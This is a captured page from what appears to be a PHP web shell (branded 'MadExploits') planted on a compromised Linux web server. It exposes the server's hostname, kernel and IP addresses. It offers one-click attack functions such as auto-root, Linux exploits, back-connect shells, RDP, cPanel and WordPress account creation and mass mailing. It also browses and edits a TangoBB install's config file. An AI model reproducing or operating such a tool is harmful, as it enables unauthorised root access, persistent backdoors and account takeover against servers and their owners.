Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 3.15.214.244
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
tangobb /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
config.php
840
B
-rw-r--r--
edit.php
4.53
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
extend.php
8.98
KB
-rw-r--r--
fileindex.php
237
B
-rw-r--r--
import.php
3.04
KB
-rw-r--r--
info.xml
2.45
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
4.23
KB
-rw-r--r--
install.xml
1.05
KB
-rw-r--r--
md5
10.37
KB
-rw-r--r--
update_pass.php
541
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.php
<?php if (!defined('BASEPATH')) { die(); } /* * TangoBB Configuration File. * TangoBB (http://tangobb.net) */ define('MYSQL_HOST', '[[softdbhost]]'); define('MYSQL_USERNAME', '[[softdbuser]]'); define('MYSQL_PASSWORD', '[[softdbpass]]'); define('MYSQL_DATABASE', '[[softdb]]'); define('MYSQL_PREFIX', '[[dbprefix]]'); define('MYSQL_PORT', 3306); /* * Iko Local Details */ define('SITE_URL', '[[softurl]]');//Without the ending "/" define('TANGOBB_VERSION', '1.5.1'); define('TANGO_SESSION_TIMEOUT', 31536000);//In seconds. define('USER_PASSWORD_HASH_COST', 10); /* * Usergroup Details. * DO NOT CHANGE IF YOU DON'T KNOW WHAT THIS WILL DO. */ define('ADMIN_ID', '4'); define('MOD_ID', '3'); define('BAN_ID', '2'); /* * Forum Configuration. */ define('THREAD_RESULTS_PER_PAGE', 12); define('POST_RESULTS_PER_PAGE', 9); ?>
Close